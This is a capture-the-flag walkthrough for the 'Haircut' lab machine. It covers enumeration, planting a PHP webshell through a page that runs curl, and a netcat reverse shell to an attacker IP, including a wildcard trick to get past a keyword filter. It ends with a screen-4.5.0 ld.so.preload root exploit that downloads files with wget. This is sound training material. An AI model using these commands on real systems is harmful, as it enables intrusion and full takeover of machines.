Haircut
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.24 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.24 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
If we take a look at the website, we won't see much going on.
Let's try to enumerate directories, TXT files, and PHP files with gobuster.
gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.
We see the /uploads folder, and the exposed.php file. We can't access the /uploads directory.
But, if we take a look at the exposed.php file, we'll see a page which will curl anything we put in the text field.
The curl tool, has an option which saves the output to a file. We can create a file named index.php, which will contain a webshell. Then, we could have a webshell by requesting that file from the website, and saving the output into a file named webshell.php in the /uploads directory. First, let's create the index.php file in our current directory.
nano index.php
Then set a simple HTTP server with python on the current directory.
python -m http.server 80
Then curl the file from the website.
http://10.10.14.13/index.php -o uploads/webshell.php
-o write to file instead of stdout.
If now we access the uploads/webshell.php file, we'll be able to execute commands on the remote machine with the cmd GET parameter.
http://10.10.10.24/uploads/webshell.php?cmd=ls -ll
To get a shell, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
And execute the following command in the webshell, which will send us a reverse shell as the user www-data, and we'll be able to grab the user flag.
http://10.10.10.24/uploads/webshell.php?cmd=nc -e /bin/bash 10.10.14.13 4444
We could also get a reverse shell by executing the nc -e /bin/bash 10.10.14.13 4444 command with $() directly from the exposed.php file. The problem is that the website bans some words, such as nc or bash.
$(nc -e /bin/bash 10.10.14.13 4444)
We can bypass it by adding the ? character in some letters of the nc and bash words. This way, the machine will automatically replace the ? signs with the correct letters, and the command will be executed.
$(/bin/n? -e /bin/b?sh 10.10.14.13 4444)
I made a python script which automates the entire process. If you are going to use it, just make sure to change the lhost variable to your IP address.
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we list the SUID binaries that exist in the machine, we'll see the /usr/bin/screen-4.5.0 binary.
find / -perm /4000 2>/dev/null
nano libhax.c
Then, compile it.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
Now, let's create the rootshell.c file, which will give us the shell as root.
nano rootshell.c
And also compile it.
gcc -o rootshell rootshell.c
Then, we'll have to transfer the libhax.so file and rootshell files to the haircut machine. Let's set a simple HTTP server with python on the current directory.
python -m http.server 80
Then, on the victim machine, let's go to the /tmp directory, and download both files from our HTTP server.
cd /tmp
wget http://10.10.14.13/libhax.so
wget http://10.10.14.13/rootshell
Then go to the /etc directory on the victim machine and execute the following commands.
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
Finally, if we execute the rootshell file of the /tmp folder, we'll get a shell as root, and all we have to do is reap the harvest and take the root flag.
/tmp/rootshell
I found on exploitdb, which indicates how to get a shell as root with the screen binary with the SUID permission. First, let's create on our machine the libhax.c file, and add the following code.
